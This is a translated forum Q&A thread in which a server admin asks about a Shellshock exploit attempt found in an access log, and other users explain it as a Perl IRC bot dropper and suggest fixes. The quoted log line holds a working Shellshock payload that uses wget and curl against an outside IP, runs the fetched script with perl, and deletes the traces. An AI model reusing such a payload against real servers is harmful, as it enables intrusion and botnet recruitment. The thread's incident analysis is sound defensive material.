Lihat ini di access.log
pada server pengujian saya:
> 173.45.100.18 - - [26/Sep/2014:07:09:53 +0200] "GET /cgi-bin/hi HTTP/1.0" 404 490 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget
> http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/jurat ;
> perl /tmp/ji;rm -rf /tmp/ji;rm -rf /tmp/ji*\""
Tidak ada alamat yang terkait dengan saya atau rentang IP kami (atau hal lainnya) yang langsung berpikir tentang bug keamanan Shellshock / "bashdoor".
Ini benar-benar terlihat seperti seseorang telah mencoba curl
"sesuatu" ke server, kemudian mengeksekusi "sesuatu" dan setelah itu menghapus "sesuatu" dengan -rf
.
Ini adalah server uji murni, tidak ada salahnya dilakukan (== tidak ada salahnya dapat dilakukan selain menginstal ulang) - tetapi waktunya sangat menarik. Belum pernah melihat yang seperti ini sebelumnya, sejauh yang saya ingat.
Haruskah saya khawatir, misalnya "tertarik"? Adakah yang tahu tentang apa ini?
security
shell-script
webserver
davidkonrad
sumber
sumber
Jawaban:
Itu adalah seseorang yang mengeksploitasi bug Shellshock. Bisakah Anda menentukan apa yang dilakukan skrip perl? Ini benar-benar layak Anda coba. URL kedua yang digunakan mengembalikan 404, tetapi
http://213.5.67.223/ji
ada dan mungkin hal yang sama, mengingat itu adalah skrip perl. Tampaknya ini semacam server IRC, jadi menyambung ke server pengujian Anda dengan klien IRC mungkin terbukti menarik. EDIT: Komentar mengoreksi saya, ini adalah klien, sehingga mampu mengintip Anda.Juga, periksa untuk melihat apakah skrip perl masih berjalan.
sumber
ps -ax | grep perl
ataups ax | grep perl
ps -ef
saya dapat melihat ada/usr/sbin/apache2 -k start
dengan stempel waktu yang sama persis :( Jadi saya kira serangan telah berhasil. Telah memperbarui bash dengansudo apt-get update && sudo apt-get install --only-upgrade bash
shell
rutin yang membuat saya khawatir: my @ resp =$comando 2>&1 3>&1
; Tidak ada salahnya dilakukan sejauh yang saya tahu.Kerentanan Shellshock digunakan untuk mengunduh (menggunakan
wget
) dan menjalankan skrip Perl berbahaya, serangan ini sangat mendasar dan mengharuskan Perl dan wget untuk diinstal (dengan asumsi salah satunya tidak dan Anda yakin tidak ada upaya cracking lain, server Anda tidak dikompromikan).Skrip itu sendiri adalah bot IRC skrip-kiddie dasar, setelah dijalankan bahwa crap terhubung ke server IRC dan menunggu perintah, sepertinya ia memiliki kemampuan pencarian Google di dalamnya, kemungkinan besar secara otomatis mencari host yang rentan dan berupaya untuk mengeksploitasinya. Selain itu, Anda tentu saja memiliki arsenal skiddie dasar, yang merupakan HTTP banjir, TCP dan UDP banjir dan akses shell (sebagai pengguna yang menjalankan skrip, yang akan menjadi pengguna di mana server HTTP berjalan sebagai).
sumber
Seperti yang disebutkan oleh orang lain, ini adalah upaya script-kiddie untuk mengeksploitasi kerentanan bash untuk mengeksekusi bot IRC berbasis skrip perl. Jika Anda memiliki bash yang diperbarui , dan di samping itu, jika Anda menjalankan apache di bawah chroot seperti saya, Anda tidak perlu khawatir. Saya melihat beberapa versi ini di log saya (lihat di bawah) setidaknya setiap hari sejak 9/27 ... ini hanya suara berisik.
Berbagai upaya eksekusi skrip (skrip python) yang baru saja saya perhatikan hari ini ... CATATAN: google-traffic-analytics.com di mana skrip python diunduh tidak ada hubungannya dengan Google, tentu saja.
sumber